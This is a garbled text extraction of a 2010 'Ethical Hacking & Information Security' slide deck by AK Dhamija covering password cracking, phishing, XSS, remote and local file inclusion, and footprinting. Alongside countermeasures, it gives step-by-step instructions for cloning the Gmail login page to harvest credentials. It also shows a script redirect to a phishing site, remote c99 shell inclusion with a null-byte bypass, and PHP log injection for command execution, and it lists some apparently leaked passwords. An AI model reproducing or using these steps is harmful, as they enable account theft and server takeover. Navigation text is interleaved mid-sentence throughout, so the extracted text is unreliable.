Ethical hacking & Information Security

Ethical Hacking & Information Security AK Dhamija Introduction Hacker Ethical Hacking & Information Security Password An Introduction Hacking Low Tech Methods High Tech Methods Countermeasures AK Dhamija Web Hacking Techniques Countermeasures DIPR, DRDO Network Hacking Techniques May 14, 2010 Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 1 / 56

Ethical Hacking & Overview Information Security 1 Introduction AK Dhamija Hacker Introduction 2 Password Hacking Hacker Low Tech Methods Password Hacking High Tech Methods Low Tech Methods Countermeasures High Tech Methods 3 Web Hacking Countermeasures Web Hacking Techniques Techniques Countermeasures Countermeasures Network 4 Network Hacking Hacking Techniques Techniques Countermeasures Countermeasures Windows Hacking 5 Windows Hacking Linux Hacking 6 Linux Hacking Wireless 7 Wireless Hacking Hacking Malware 8 Malware References 9 References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 2 / 56

Introduction Ethical Hacking & Computer Security : CIA (Conﬁdentiality, Integrity, Information Security Authentication) AK Dhamija Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Computer Security Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 3 / 56

Introduction Ethical Hacking & Computer Security : CIA (Conﬁdentiality, Integrity, Information Security Authentication) AK Dhamija Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Computer Security Countermeasures Network Hacking Network Security Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 4 / 56

Introduction Ethical Hacking & Computer Security : CIA (Conﬁdentiality, Integrity, Information Security Authentication) AK Dhamija Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Computer Security Web Hacking Techniques Countermeasures Network Security Network Hacking Techniques Countermeasures Information Security Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 5 / 56

Introduction Ethical Hacking & Computer Security : CIA (Conﬁdentiality, Integrity, Information Security Authentication) AK Dhamija Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Computer Security Web Hacking Techniques Countermeasures Network Security Network Hacking Information Security Techniques Countermeasures Windows are OXYMORONS Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 6 / 56

Introduction Ethical Hacking & Hacked Passwords Information Security AK Dhamija Top ten most-popular passwords (in that order) from among 32 million hacked from RockYou.com Introduction Hacker 123456, 12345, 123456789, Password, iloveyou, princess, rockyou, 1234567, 12345678, abc123 Password Hacking Low Tech Imperva’s study of ”Consumer Password Worst Practices” Methods High Tech Methods • About 30 percent of users chose passwords whose length is equal or below six characters. Countermeasures • Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters. Web Hacking Techniques • Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive Countermeasures digits, adjacent keyboard keys, and so on) Network Hacking Techniques Good Password Practices Countermeasures Windows • It should contain at least eight characters Hacking • It should contain a mix of four diﬀerent types of characters - upper case letters, lower case letters, Linux Hacking numbers, and special characters such as #$%&*,;” If there is only one letter or special character, it should not be either the ﬁrst or last character in the password. Wireless Hacking • It should not be a name, a slang word, or any word in the dictionary. It should not include any part of your name or your e-mail address. Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 7 / 56

Introduction Ethical Hacking & Hacked Passwords Information Security AK Dhamija Introduction Hacker Ditalee, Ditalee1, Ditalee3 Password Hacking iambhiku Low Tech Methods pareekshanh84 High Tech Methods Countermeasures *sha1973****** Web Hacking peter1 Techniques Countermeasures hemant Network love25786 Hacking Techniques 080176 Countermeasures Windows kingoforkut Hacking iloveyou Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 8 / 56

Introduction Hacker Ethical Hacking & Hacker Information Security AK Dhamija What is a Hacker ? Introduction Hacker Hacker Password A hacker is someone who likes to tinker with electronics or computer Hacking Low Tech systems : ﬁnding ways to make them do what they do better, or do Methods High Tech things they weren’t intended to do Methods Countermeasures Web Hacking Two types of Hacker Techniques Countermeasures • White Hat : Network Hacking • Good Guys Techniques • Don’t use their skills for illegal purposes Countermeasures • Computer Security experts and help protect people from the Black Hats Windows Hacking • Black Hat : Linux Hacking • Bad Guys • Use their skills maliciously for personal gain Wireless • Hack banks, steal credit cards, and deface websites Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 9 / 56

Introduction Hacker Ethical Hacking & Hacker Hierarchy Information Security AK Dhamija Introduction Hacker Hierarchy Hacker Password • Script kiddies : Hacking Low Tech • Wannabe hackers Methods • Have no hacking skills and use the tools developed by other hackers High Tech Methods • No knowledge of what’s happening behind the scenes Countermeasures Web Hacking • Intermediate hackers : Techniques • Usually know about computers, networks, and have enough programming knowledge to Countermeasures understand what a script might do Network • Use pre-developed well-known exploits (code that takes advantage of a bug or vulnerability) Hacking to carry out attacks Techniques Countermeasures • Elite Hackers : Windows • skilled hackers Hacking • write hacker tools and exploits • break into systems and hide their tracks Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 10 / 56

Introduction Hacker Ethical Hacking & Becoming Hacker Information Security AK Dhamija Introduction Hacker What does it take to become a hacker? Password Hacking Low Tech Qualities needed Methods High Tech Methods • Creativity Countermeasures Web Hacking • Will to learn Techniques Countermeasures • Knowledge is power Network Hacking • Patience Techniques Countermeasures • Programming to be an elite hacker Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 11 / 56

Password Hacking Low Tech Methods Ethical Hacking & Old Fashioned Low-Tech Methods Information Security AK Dhamija Introduction Hacker Password Hacking Low-Tech Methods Low Tech Methods High Tech • Social Engineering Methods Countermeasures • Hacker takes advantage of trusting human beings to get information from them • e.g. a ploy to install a new security update on your computer Web Hacking Techniques Countermeasures • Shoulder surﬁng Network Hacking • Guessing Techniques • Week Passwords like date of birth, phone number, favorite pet etc Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 12 / 56

Password Hacking High Tech Methods Ethical Hacking & High Tech Methods Information Security AK Dhamija Introduction Hacker High Tech Methods Password Hacking • Gmail system administrator’s automatic responder Low Tech Methods High Tech • Dictionary Attacks Methods Countermeasures • Brute Force Attacks Web Hacking Techniques Countermeasures • Rainbow Tables Network Hacking • Phishing Techniques Countermeasures • GX Cookies Windows Hacking • ARP Poisoning Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 13 / 56

Password Hacking High Tech Methods Ethical Hacking & Gmail system administrator’s automatic responder Information Security AK Dhamija Introduction High-Tech Techniques : Gmail system administrator’s automatic Hacker responder Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 14 / 56

Password Hacking High Tech Methods Ethical Hacking & Gmail system administrator’s automatic responder Information Security AK Dhamija Introduction High-Tech Techniques : Gmail system administrator’s automatic Hacker responder Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 15 / 56

Password Hacking High Tech Methods Ethical Hacking & Gmail system administrator’s automatic responder Information Security AK Dhamija High-Tech Techniques : Gmail system administrator’s automatic Introduction Hacker responder Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 16 / 56

Password Hacking High Tech Methods Ethical Hacking & Dictionary Attacks Information Security AK Dhamija Introduction Hacker High-Tech Techniques : Dictionary Attacks Password • a text ﬁle full of commonly used passwords, or a list of every word from the dictionary is used against Hacking a password database Low Tech Methods • Brutus, a very common password cracker High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 17 / 56

Password Hacking High Tech Methods Ethical Hacking & Dictionary Attacks Information Security AK Dhamija High-Tech Techniques : Dictionary Attacks Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 18 / 56

Password Hacking High Tech Methods Ethical Hacking & Dictionary Attacks Information Security AK Dhamija High-Tech Techniques : Dictionary Attacks Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking IP Masquerading, Anonymous proxy and switching proxies are the Malware techniques used to hide IP References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 19 / 56

Password Hacking High Tech Methods Ethical Hacking & Brute-force Attacks Information Security AK Dhamija High-Tech Techniques : Brute-force Attacks Introduction Hacker • With time, brute-force attacks can crack any passwords Password Hacking • Try every possible combination of letters, numbers, and special characters until the right password is found . Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 20 / 56

Password Hacking High Tech Methods Ethical Hacking & Brute-force Attacks Information Security AK Dhamija High-Tech Techniques : Brute-force Attacks Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 21 / 56

Password Hacking High Tech Methods Ethical Hacking & Brute-force Attacks Information Security AK Dhamija Introduction Hacker Password Hacking High-Tech Techniques : Rainbow Tables Low Tech Methods High Tech • A huge pre-computed list of hash values for every possible combination of characters Methods Countermeasures • A hash is a one way encryption - MD5 Web Hacking • cheese through the md5 algorithm, would be fea0f1f6fede90bd0a925b4194deac11 Techniques Countermeasures • Having huge tables of every possible character combination hashed is a much better alternative to brute-force cracking Network Hacking • Once the rainbow tables are created, cracking the password is a hundred times faster than Techniques brute-forcing it Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 22 / 56

Password Hacking High Tech Methods Ethical Hacking & Phishing Information Security AK Dhamija Introduction Hacker Password High-Tech Techniques : Phishing Hacking Low Tech • Stealing sensitive information, such as usernames, passwords, and bank information, by pretending to Methods be someone you’re not High Tech Methods Countermeasures • First the hacker chooses a target (Hotmail and Gmail) Web Hacking • Go to www.gmail.com and click File − > Save page as ... Techniques Countermeasures • Rename ServiceLogin.htm to index.htm Network • PHP script that logs and stores your login details when you click ”Sign in” Hacking Techniques • Save this script into the same directory as you saved the Gmail page, and name it phish.php Countermeasures • Create a new empty text ﬁle and name it list.txt Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 23 / 56

Password Hacking High Tech Methods Ethical Hacking & Phishing Information Security AK Dhamija High-Tech Techniques : Phishing PHP Script Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 24 / 56

Password Hacking High Tech Methods Ethical Hacking & Phishing Information Security AK Dhamija High-Tech Techniques : Phishing Introduction Hacker • open up the main Gmail page named index.htm with notepad Password • Look for first occurrence of the word ”action” in the script Hacking Low Tech Methods High Tech • There are two ”action” occurrences in the script so make sure you have the right one by looking at Methods the ”form id” name above Countermeasures Web Hacking • Change the link between action = ” ” to phish.php. This will make the form submit to your PHP phish script instead of to Google Techniques Countermeasures Network • After the link you will see the code Hacking • Change the word ”POST” to ”GET” so that it looks like method=”GET”. This submits the Techniques information you type so that the PHP script can log it Countermeasures Windows • Save and close the file Hacking • Upload the files up to a free webhost that supports PHP Linux Hacking • change file permission of ”list.txt” to 777 Wireless Hacking • http://www.yourwebhosturl.com/youraccount/list.txt will give you the username and password Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 25 / 56

Password Hacking High Tech Methods Ethical Hacking & Phishing Information Security AK Dhamija High-Tech Techniques : Phishing Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 26 / 56

Password Hacking High Tech Methods Ethical Hacking & GX Cookies Information Security AK Dhamija Introduction Hacker High-Tech Techniques : GX Cookies Password Hacking • Cookies are used by web browsers to store your user information so that you can stay logged into a website even after you leave. By stealing your cookie, the attacker can sometimes login without Low Tech Methods knowing your password High Tech Methods • When Users login into Gmail account, Gmail Server sends Cookie (A text file) to your browser Countermeasures • This file helps Gmail server to know that you are authenticated. This Cookie will log-in you in for 2 Web Hacking week unless you press sign-out or delete the Cookie Techniques Countermeasures • Even though when you authenticated using SSL, after that you are also not secure because the result return by the Gmail server is unencrypted connection. Network Hacking • Every time you request anything from the Gmail server like an image, your browser sends this Cookie Techniques file to Gmail server and any attacker can easily get this Cookie file by applying any network sniffer Countermeasures tool Windows Hacking • After this attacker get your Gmail session ID and using this Session ID attacker can easily logged in your Gmail account without the need of any Username and Password Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 27 / 56

Password Hacking High Tech Methods Ethical Hacking & GX Cookies Information Security AK Dhamija High-Tech Techniques : GX Cookies Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 28 / 56

Password Hacking High Tech Methods Ethical Hacking & ARP Poisoning Information Security AK Dhamija Introduction Hacker High-Tech Techniques : ARP Poisoning Password Hacking • Address Resolution Protocol (ARP) is a Layer 2 protocol Low Tech Methods • Allows an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop the High Tech traffic altogether Methods Countermeasures • the aim is to associate the attacker’s MAC address with the IP address of another node (such as the default gateway) Web Hacking Techniques • Any traffic meant for that IP address would be mistakenly sent to the attacker instead. Countermeasures • The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing) Network or modify the data before forwarding it (man-in-the-middle attack) Hacking Techniques • The attacker could also launch a denial-of-service attack against a victim by associating a Countermeasures nonexistent MAC address to the IP address of the victim’s default gateway Windows • ARP spoofing attacks can be run from a compromised host, or from an attacker’s machine that is Hacking connected directly to the target Ethernet segment Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 29 / 56

Password Hacking High Tech Methods Ethical Hacking & ARP Poisoning Information Security AK Dhamija High-Tech Techniques : ARP Poisoning Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 30 / 56

Password Hacking Countermeasures Ethical Hacking & Password Hacking Information Security AK Dhamija Countermeasures Introduction Social Engineering Hacker • Ask some questions that he should be able to answer to establish his legitimacy. Password Hacking • Some professionals study the company before attacking, so they might know all the answers. Low Tech Methods • In case of doubts, you should ask the head of whatever department the attacker is from High Tech Methods Countermeasures Shoulder Surﬁng Web Hacking • Make sure there is no one behind you attempting to peak Techniques Countermeasures • Don’t keep any sticky notes laying around that have your password or password hints on them Network Hacking Guessing Techniques Countermeasures • Never use a password like your birth date, your mother’s maiden name, your pets name, your spouse’s name, or anything that someone may be able to guess Windows Hacking Gmail system administrator’s automatic responder Linux Hacking • Don’t fall prey to such tatics Wireless Hacking • Don’t respond to mails, if you can’t identify the sender Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 31 / 56

Password Hacking Countermeasures Ethical Hacking & Password Hacking Information Security AK Dhamija Countermeasures Introduction Dictionary Attacks Hacker • Don’t use a password that is in the dictionary Password Hacking • If you use a word from the dictionary but replace most of the letters with a number, you are not safe. Low Tech 1337 speak dictionary is changing a word like ”animal” to 4n1m41 Methods High Tech • Use something like doyoulikecheese?88 Methods Countermeasures Brute-force Attacks Web Hacking Techniques • Creating a very long password and using many numbers and odd characters Countermeasures • Creating a phrase for your password is your best option for staying secure Network Hacking Techniques Rainbow Tables Countermeasures • Creating tables for passwords that are long takes a very long time and a lot of resources Windows Hacking Phishing Linux Hacking • Beware of gmail.randomsite.com, or gamilmail.com Wireless Hacking • When you are on the real Gmail website, the URL should begin with www.google.com anything else is a fake Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 32 / 56

Password Hacking Countermeasures Ethical Hacking & Password Hacking Information Security AK Dhamija Introduction Hacker Password Countermeasures Hacking Low Tech GX Cookies Methods High Tech • Do not use Gmail from public places, cybercaf´ and public wireless hotspots e Methods Countermeasures • Always use https://mail.google.com because this will access the SSL version of Gmail. it will be persistent over your entire session and not only during authentication Web Hacking Techniques Countermeasures ARP Poisoning Network • Static ARP inspection (SARPI) or dynamic ARP inspection (DARPI) approach on switched or Hacking hubbed LANs with or without DHCP Techniques Countermeasures • Always use https://mail.google.com because this will access the SSL version of Gmail. it will be persistent over your entire session and not only during authentication Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 33 / 56

Password Hacking Countermeasures Ethical Hacking & Password Cracking Information Security AK Dhamija Introduction Hacker Password Hacking Other Programs Low Tech Methods High Tech • Cain and Abel Methods Countermeasures • John the Ripper Web Hacking Techniques • THC Hydra Countermeasures Network • SolarWinds Hacking Techniques Countermeasures • RainbowCrack Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 34 / 56

Web Hacking Ethical Hacking & Web Hacking Information Security AK Dhamija Introduction Hacker Password Hacking Low Tech Methods Techniques High Tech Methods Countermeasures • Cross Site Scripting (XSS) Web Hacking • Remote File Inclusion (RFI) Techniques Countermeasures • Local File Inclusion (RFI) Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 35 / 56

Web Hacking Techniques Ethical Hacking & Web Hacking Information Security AK Dhamija Cross Site Scripting (XSS) Introduction • User inputs malicious data into a website Hacker • Aﬀected Sites FBI, CNN, Ebay, Apple, Microsft, and AOL Password Hacking • features commonly vulnerable to XSS attacks are Low Tech Methods • Search Engines High Tech • Login Forms Methods • Comment Fields Countermeasures Web Hacking • Three types of XSS attacks Techniques • Local Countermeasures • Rarest & hardest to pull oﬀ Network • Requires an exploit for a browser Hacking • hacker can install worms, spambots, and backdoors onto your computer Techniques Countermeasures • Non-Persistent Windows • most common types of attack and don’t harm the actual website Hacking • A client side script or HTML is inserted into a variable which causes the output that the user sees to be changed Linux Hacking • Only activated when the user visits the URL crafted by the attacker Wireless • Persistent Hacking • Steal website cookies • Deface the website Malware • Spread Worms References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 36 / 56

Web Hacking Techniques Ethical Hacking & Cross Site Scripting (XSS) Information Security AK Dhamija XSS : How can we say whether the site is vulnerable • If there is a search field, enter a word and if that word is displayed back to you on the next page, there’s a chance it is vulnerable Introduction Hacker • Search for < h1 > hi < /h1 >, and if the word ”hi” is outputted as a big header, it is vulnerable Password • Search for < script > alert(”hi”); < /script > , if the word ”hi” pops up in a popup box, Hacking then the site is vulnerable to XSS Low Tech • These examples are non-persistent. Now if the hacker finds a guestbook etc, he can make it Methods persistent and everyone that visits the page would get the above alert if that was part of his comment High Tech Methods Countermeasures Web Hacking XSS for Phishing Techniques We want to craft a link pointing to the legit website (www.victim-site.com) that redirects to phishing website Countermeasures • when JavaScript is inserted into the search box, a URL was formed that looked like Network Hacking Techniques Countermeasures • the code we typed into the search box was passed to the ”searchbox” variable • Replace everything in between ?searchbox= and &search with JavaScript code Windows < script > window.location = ”http : //phishing − site.com” < /script > Hacking • Now when you go to the finished link, the legitimate site will redirect to the phishing website. Linux Hacking • Encode the URL to make it look more legit - http://www.encodeurl.com/ Wireless • It may look something like Hacking http%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+ %5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21 Malware • Once the victim sees that the link points to the legitimate website, he will be more likely to fall for References the phishing attack AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 37 / 56

Web Hacking Techniques Ethical Hacking & Remote File Inclusion (RFI) Information Security AK Dhamija RFI : How can we say whether the site is vulnerable • A remote file, usually a shell is included into a website which allows the hacker to execute server side Introduction commands as the current logged on user, and have access to files on the server Hacker • Many servers are vulnerable to this kind of attack because of PHP’s default settings of register globals and allow url fopen being enabled Password Hacking • PHP 6.0 onwards, register globals has been depreciated Low Tech Methods High Tech Methods RFI : Exploiting the vulnerability Countermeasures • First the hacker would find a website that gets its pages via the PHP include() function and is Web Hacking vulnerable to RFI. Techniques Countermeasures • Many hackers use Google dorks to locate servers vulnerable to RFI. Network • A Google dork is the act of using Google’s provided search tools to help get a specific search result. eg allinurl : .php?page = looks for URL’s with .php?page = in them Hacking Techniques • To get relevant sites, Switch around the word ”page” with other letters and similar words Countermeasures • Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that Windows vulnerable web application with a Google dork Hacking • Website that include pages have a navigation system similar to: Linux Hacking http : //target − site.com/index.php?page = P ageN ame Wireless • To see if a the page is vulnerable, the hacker would try to include a site instead of PageName like Hacking http : //target − site.com/index.php?page = http : //google.com Malware • If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 38 / 56

Web Hacking Techniques Ethical Hacking & Remote File Inclusion (RFI) Information Security AK Dhamija RFI : Exploiting the vulnerability • Most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them (search inurl:c99.txt) Introduction Hacker • This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and Password not cause any problems. Hacking Low Tech • The new URL with the shell included would look like Methods http : //target − site.com/index.php?page = http : //site.com/c99.txt? High Tech Methods • Sometimes the PHP script on the server appends ”.php” but ”c99.txt.php” would not work. Countermeasures • To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt Web Hacking Techniques • If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 39 / 56

Web Hacking Techniques Ethical Hacking & Remote File Inclusion (RFI) Information Security AK Dhamija Introduction Hacker Password Hacking Low Tech RFI : Exploiting the vulnerability Methods High Tech • The shell will display information about the remote server and list all the files and directories on it. Methods Countermeasures • From here the hacker would find a directory that has read and write privileges Web Hacking • Upload the shell as a .php file so that incase the vulnerability is fixed, he will be able to access it later on Techniques Countermeasures • Root privileges become vulnerable now by uploading and running local exploits against the server Network • He could also search the victim server for configuration files. These files may contain username and Hacking passwords for the MYSQL databases etc Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 40 / 56

Web Hacking Techniques Ethical Hacking & Local File Inclusion (LFI) Information Security AK Dhamija LFI : How can we say whether the site is vulnerable • when you have the ability to browse through the server by means of directory transversal (discover the /etc/passwd file) Introduction Hacker • Vulnerable sites are found similar ti RFI (www.target − site.com/index.php?p = ../../../../../../../etc/passwd) Password Hacking • /etc/passwd file would display each line as username:passwd:UserID:GroupID:full name:directory:shell Low Tech • eg Root:x:0:0::/root:/bin/bash Methods High Tech • If the password hash was shown, the hacker would be able to crack it and get access to the machine Methods Countermeasures • if password is shadowed and in the /etc/shadow file which the hacker doesn’t have access to, then he may get access to the system through log injection Web Hacking • The log directories are located in different areas in different Linux distributions (find error.log, Techniques access.log, error log, access log etc) Countermeasures Network Hacking LFI : Gaining access to the system through log injection Techniques Countermeasures • Search for OS version the target server then search where the log files are located on that OS Windows • The hacker would then inject some PHP code into the logs by typing Hacking <? P assthru($ GET [ cmd ]) ? > after = in the URL Linux Hacking • This will cause the PHP script to be logged because there is no file by that name. This script will give the hacker shell access and allow him to execute system commands Wireless • if you go back to the log file, you will see that PHP script wasn’t parsed and instead converted to Hacking %3C?%20passthru($ GET [cmd])%20?%3E Malware • When we submitted the script, the browser automatically encoded the URL. We can use a pearl script that can get around this problem. References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 41 / 56

Web Hacking Techniques Ethical Hacking & Local File Inclusion (LFI) Information Security AK Dhamija LFI : Gaining access to the system through log injection • Edit the variables: site,path, code, andlog to the appropriate information Introduction • Once the hacker runs this script and it goes successfully, he can run any command on the server. Hacker • From here he can run any local exploits to gain root, or just browse the server ﬁles Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 42 / 56

Web Hacking Countermeasures Ethical Hacking & Web Hacking Information Security AK Dhamija Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Countermeasures • Make sure you are using up-to-date scripts Web Hacking Techniques • Make sure you server php.ini ﬁle has register globals and allow url fopen disabled Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 43 / 56

Network Hacking Ethical Hacking & Network Hacking Information Security AK Dhamija Introduction Hacker Password Hacking Techniques Low Tech Methods High Tech • Foot Printing Methods Countermeasures • Port Scanning Web Hacking Techniques • Banner Grabbing Countermeasures Network • Searching for Vulnerabilities Hacking Techniques • Penetrating Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 44 / 56

Network Hacking Techniques Ethical Hacking & Footprinting Information Security AK Dhamija Footprinting Introduction • To hack a system the hacker must ﬁrst know everything there is to know about it Hacker • Gathering information about a computer system and the companies it belongs to Password Hacking Low Tech Footprinting Steps Methods High Tech Methods • A hacker would start gathering information on the targets website. Things to look for are e-mails and names Countermeasures • Get the IP address of the website Web Hacking Techniques • Ping the server to see if it is up and running Countermeasures • Do a Whois lookup on the company website. Go to http://whois.domaintools.com and put in the target website Network Hacking • You see the company e-mails, address, names, when the domain was created, when the domain Techniques expires, the domain name servers, and more! Countermeasures Windows • A hacker can also take advantage of search engines to search sites for data Hacking • ”site : www.the − target − site.com” this will display every page that Google has of the website Linux Hacking • ”site : www.the − target − site.comemail” will list several emails that are published on the website Wireless • ”inurl : robots.txt” would look for a page called robots.txt, which displays all the Hacking directories and pages on the website that they wish to keep anonymous from the search engine spiders Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 45 / 56

Network Hacking Techniques Ethical Hacking & Port Scanning Information Security AK Dhamija Port Scanning Introduction Hacker • To detect the port’s listening services on server’s open ports so as to detect the vulnerabilities • The Nmap Security Scanner is available for both Mac and Windows users: Password http://nmap.org/download.html Hacking Low Tech Methods High Tech Methods Port Scanning Steps Countermeasures • Choose a target and place it in the target box Web Hacking Techniques • choose the ”Proﬁle” Countermeasures Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware References AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 46 / 56

Network Hacking Techniques Ethical Hacking & Port Scanning Information Security AK Dhamija Port Scanning Steps • A sample scan result may look like Introduction Hacker Password Hacking Low Tech Methods High Tech Methods Countermeasures Web Hacking Techniques Countermeasures • List of some of the most popular ports/services on the internet Network Hacking Techniques Countermeasures Windows Hacking Linux Hacking Wireless Hacking Malware • the hacker needs to also ﬁnd out what operating system the server is running (Visiting a non-existent References page gives 404 error page which shows the OS) AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 47 / 56

